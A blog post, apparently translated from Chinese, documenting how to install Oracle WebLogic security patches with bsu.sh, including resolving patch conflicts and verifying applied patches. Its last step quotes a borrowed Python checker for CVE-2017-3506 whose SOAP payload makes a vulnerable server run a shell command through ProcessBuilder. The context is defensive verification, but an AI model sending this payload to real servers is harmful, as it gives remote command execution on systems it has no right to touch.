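Although WebLogic is a heavyweight middleware product from a big-name vendor, Oracle, vulnerabilities in it still surface from time to time. If they are not patched promptly, attackers will soon use them to trade for points on certain websites or to plant malware and turn the servers into bots. Without further ado: because patching WebLogic follows basically the same routine every time, this post records the procedure.
1. Environment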
{MW_HOME} = /usr/local/bea
{WL_HOME} = /usr/local/bea/wlserver_10.3
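Below, {MW_HOME} and {WL_HOME} stand in for the real paths.
2. Copy the patch file into {MW_HOME}/utils/bsu/cache_dir and unpack it. You usually get a jar, a file named like patch-catalog_xxxxx.xml, and a readme (if your English is good, the readme alone is enough to get the job done).
3. Go to the {MW_HOME}/utils/bsu/ directory and change the memory setting in bsu.sh to MEM_ARGS="-Xms1500m -Xmx1500m". The amount of memory needed differs from patch to patch; if it is too small the run fails with an error, so if memory is not scarce, simply set it a bit larger.
4. Run the patch installation command
./bsu.sh -install -patch_download_dir={MW_HOME}/utils/bsu/cache_dir -patchlist={PATCH_ID} -prod_dir={WL_HOME}
The formatting may break when pasted; if you get an error, type the command by hand.
5. Now comes a long wait, which ends in one of two ways. One is a successful installation: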
Checking for conflicts............
No conflict(s) detected
Installing Patch ID: FMJJ..
Result: Success
The other is a patch conflict:
Checking for conflicts...........
Conflict(s) detected - resolve conflict condition and execute patch installation again
Conflict condition details follow:
Patch FMJJ is mutually exclusive and cannot coexist with patch(es): EJUW,ZLNA
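The message says that this patch conflicts with the previously applied patches EJUW and ZLNA. In that case the earlier patches have to be removed before the installation can continue.
Run the command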
./bsu.sh -remove -verbose -patchlist=EJUW -prod_dir={WL_HOME}
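This is another long wait while WebLogic checks whether the removal has dependencies. When a patch conflicts with two or more patches like this, just pick one of them (I suggest removing the last patch in the list first). After the long wait, the system may then tell you that before this patch can be removed, patch xxx has to be removed first: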
Checking for conflicts.......
Conflict(s) detected - resolve conflict condition and execute patch removal again
Conflict condition details follow:
The selected patch cannot be removed until the following patch(es) are removed first: ZLNA
Then all you can do is what WebLogic says and remove them one by one:
Checking for conflicts...........
No conflict(s) detected
Starting removal of Patch ID: EJUW
Removing /usr/local/bea/modules/com.bea.core.weblogic.stax_1.11.0.0.jar
Removing /usr/local/bea/wlserver_10.3/server/lib/wlt3jmsclient.jar
Removing /usr/local/bea/wlserver_10.3/server/lib/wlt3client.jar
Removing /usr/local/bea/modules/com.bea.core.stax2_2.0.0.0_3-0-3.jar
Removing /usr/local/bea/wlserver_10.3/bugsfixed/WLS-PSU-bugsfixed.txt
Removing /usr/local/bea/wlserver_10.3/bugsfixed/20780171-WLS-10.3.6.0.12_PSU_WebServices-ClientSide-Configuration-README.txt
Restoring /usr/local/bea/wlserver_10.3/server/lib/consoleapp/APP-INF/lib/commons-fileupload.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wljmxclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.oracle.cie.config-wls-schema_10.3.6.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/wlst/modules/jython-modules.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/bin/wlsifconfig.sh from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlstestclient.ear from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlthint3client.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.utils.full_1.10.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.bea.opensaml_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/ws.databinding_1.3.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jsf-2.0.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/schema/weblogic-domain-binding.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/webserviceclient+ssl.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlw-langx.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wljmsclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlsafclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.apache_1.3.0.1.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlsaft3client.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wseeclient.zip from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.common.security.saml2_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/glassfish.jstl_1.2.0.1.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wls-api.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jsf-1.2.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jstl-1.2.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.descriptor.wl.binding_1.4.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.oracle.cie.config-wls_7.2.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jms-notran-adp.rar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jms-xa-adp.rar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jdbcdrivers.xml from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/uddiexplorer.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/ws.databinding.plugins_1.3.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/webserviceclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wseeclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.utils_1.10.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/consoleapp/webapp/WEB-INF/lib/console.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.bea.opensaml2_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/BUG20780171_1036012.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/com.bea.core.apache.commons.fileupload_1.0.0.0_1-3-1.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/com.bea.core.stax2_2.0.0.0_3-0-3.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxb.xjc_1.2.0.0_2-1-14.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxb_1.2.0.0_2-1-14.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxp_1.4.5.0.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxws.mimepull_1.1.0.0_1-3-8.jar
Updating /usr/local/bea/patch_wls1036/profiles/default/sys_manifest_classpath/weblogic_patch.jar
Old manifest value: Class-Path= ../../../patch_jars/BUG20780171_1036012.jar ../../../patch_jars/com.bea.core.apache.commons.fileupload_1.0.0.0_1-3-1.jar ../../../patch_jars/com.bea.core.stax2_2.0.0.0_3-0-3.jar ../../../patch_jars/glassfish.jaxb.xjc_1.2.0.0_2-1-14.jar ../../../patch_jars/glassfish.jaxb_1.2.0.0_2-1-14.jar ../../../patch_jars/glassfish.jaxp_1.4.5.0.jar ../../../patch_jars/glassfish.jaxws.mimepull_1.1.0.0_1-3-8.jar
New manifest value: Class-Path=
Result: Success
Then continue with the installation; this time it can only succeed:
Checking for conflicts............
No conflict(s) detected
Installing Patch ID: FMJJ..
Result: Success
6. Check whether the patch you just installed now appears in WebLogic's list of applied patches
[bsu]# ./bsu.sh -prod_dir=/usr/local/bea/wlserver_10.3 -status=applied -verbose -view
ProductName: WebLogic Server
ProductVersion: 10.3 MP6
Components: WebLogic Server/Core Application Server,WebLogic Server/Admi
nistration Console,WebLogic Server/Configuration Wizard and
Upgrade Framework,WebLogic Server/Web 2.0 HTTP Pub-Sub Serve
r,WebLogic Server/WebLogic SCA,WebLogic Server/WebLogic JDBC
Drivers,WebLogic Server/Third Party JDBC Drivers,WebLogic S
erver/WebLogic Server Clients,WebLogic Server/WebLogic Web S
erver Plugins,WebLogic Server/UDDI and Xquery Support,WebLog
ic Server/Evaluation Database,WebLogic Server/Workshop Code
Completion Support
BEAHome: /usr/local/bea
ProductHome: /usr/local/bea/wlserver_10.3
PatchSystemDir: /usr/local/bea/utils/bsu
PatchDir: /usr/local/bea/patch_wls1036
Profile: Default
DownloadDir: /usr/local/bea/utils/bsu/cache_dir
JavaVersion: 1.6.0_29
JavaVendor: Sun
Patch ID: FMJJ
PatchContainer: FMJJ.jar
Checksum: 591477727
Severity: optional
Category: General
CR/BUG: 26519424
Restart: true
Description: WLS PATCH SET UPDATE 10.3.6.0.171017
WLS PATCH SET UPDATE 10
.3.6.0.171017
7. Use an existing PoC script or some other method to check whether the vulnerability is still present
Here is the Python detection script for this vulnerability, CVE-2017-3506, borrowed from an expert's blog; no offence meant.
#!/usr/bin/env python
# coding:utf-8
# author: dayu (the original author's signature)
import requests
import re
from sys import argv

heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Content-Type': 'text/xml;charset=UTF-8'
}


def poc(url):
    # Build the URL of the wls-wsat endpoint on the server being checked
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/wls-wsat/CoordinatorPortType'
    post_str = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ls</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
    try:
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
        response = response.text
        # Keep only the SOAP fault string; no match raises and is handled below
        response = re.search(r"<faultstring>.*</faultstring>", response).group(0)
    except Exception:
        response = ""
    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
        result = "Vulnerability exist"
        return result
    else:
        result = "No Vulnerability"
        return result


if __name__ == '__main__':
    if len(argv) == 1:
        # Usage message: python <script> url:port
        print("python 参数 url:port")
        exit(0)
    else:
        url = argv[1]
        result = poc(url=url)
        print(result)
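P.S. This record was made while installing the patch for CVE-2017-3506. The patch installed has ID FMJJ; the IDs it conflicted with were ZLNA and EJUW.
I wrote a simple Python script that applies patches automatically. (There are not many patching commands and they are not complicated, but each one takes twenty-odd minutes to run, so getting through a few of them is quite time-consuming; that is why I wrote a script, which also suits installing on several machines.) Since my Python skills are limited, I won't embarrass myself by posting the code; if you need it, message me privately 0.0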
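The install, conflict, remove and verify loop from steps 4 to 6 can be driven from bsu.sh's own messages. The sketch below is an added example, not the author's script and not Oracle code. It assumes a hypothetical callable run_bsu(action, patch_id) that runs the bsu.sh commands shown on this page ("install", "remove", or "view" for the -status=applied listing) and returns their text output.

```python
import re

# Message fragments taken from the bsu.sh output quoted on this page.
EXCLUSIVE = re.compile(r"cannot coexist with patch\(es\):\s*([\w, ]+)")
REMOVE_FIRST = re.compile(r"patch\(es\) are removed first:\s*([\w, ]+)")

def parse_bsu(output):
    """Classify one bsu.sh run as (status, blocking patch IDs)."""
    for status, pattern in (("exclusive", EXCLUSIVE), ("remove_first", REMOVE_FIRST)):
        m = pattern.search(output)
        if m:
            return status, [p.strip() for p in m.group(1).split(",") if p.strip()]
    return ("success" if "Result: Success" in output else "error"), []

def applied_patches(view_output):
    """Patch IDs listed by `bsu.sh -status=applied -verbose -view`."""
    return re.findall(r"^Patch ID:\s*(\S+)", view_output, re.MULTILINE)

def remove_patch(run_bsu, patch_id, removed, pending=()):
    """Remove patch_id, first removing whatever bsu says must go before it."""
    if patch_id in removed:
        return  # already removed as a prerequisite of another patch
    if patch_id in pending:
        raise RuntimeError("removal dependency loop at " + patch_id)
    status, blockers = parse_bsu(run_bsu("remove", patch_id))
    if status == "remove_first":
        for blocker in blockers:
            remove_patch(run_bsu, blocker, removed, pending + (patch_id,))
        status, _ = parse_bsu(run_bsu("remove", patch_id))
    if status != "success":
        raise RuntimeError("could not remove " + patch_id)
    removed.append(patch_id)

def install_patch(run_bsu, patch_id):
    """Install patch_id; return the patches that had to be removed for it."""
    removed = []
    status, blockers = parse_bsu(run_bsu("install", patch_id))
    if status == "exclusive":
        for blocker in reversed(blockers):  # the page suggests starting with the last
            remove_patch(run_bsu, blocker, removed)
        status, _ = parse_bsu(run_bsu("install", patch_id))
    # Step 6: success only counts if the patch shows up in the applied list.
    if status != "success" or patch_id not in applied_patches(run_bsu("view", None)):
        raise RuntimeError("patch %s is not applied" % patch_id)
    return removed
```

The list that install_patch returns is worth recording per host: it names the earlier patches that are no longer applied after the run.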